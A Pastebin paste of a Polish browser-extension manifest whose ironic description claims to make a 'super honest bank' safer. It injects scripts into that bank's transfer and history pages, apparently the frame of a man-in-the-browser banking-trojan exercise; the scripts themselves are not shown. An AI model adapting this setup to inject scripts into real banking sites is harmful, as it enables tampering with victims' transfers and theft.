Advertisement
Guest User

Untitled

a guest
Nov 19th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. {
  2.  
  3. "manifest_version": 2,
  4. "name": "Ubezpieczator",
  5. "version": "1.0",
  6.  
  7. "description": "Sprawia że strona super uczciwego banku jest jeszcze bezpieczniejsza",
  8.  
  9. "icons": {
  10. "48": "icons/border-48.png"
  11. },
  12.  
  13. "content_scripts": [
  14. {
  15. "matches": ["*://*.uczciwybank.pl/transfer.php"],
  16. "js": ["jquery.js","transfer.js"]
  17. },
  18. {
  19. "matches": ["*://*.uczciwybank.pl/transfer2.php"],
  20. "js": ["jquery.js","transfer23.js"]
  21. },
  22. {
  23. "matches": ["*://*.uczciwybank.pl/transfer3.php"],
  24. "js": ["jquery.js","transfer23.js"]
  25. },
  26. {
  27. "matches": ["*://*.uczciwybank.pl/history.php"],
  28. "js": ["jquery.js","history.js"]
  29. }
  30. ]
  31.  
  32. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement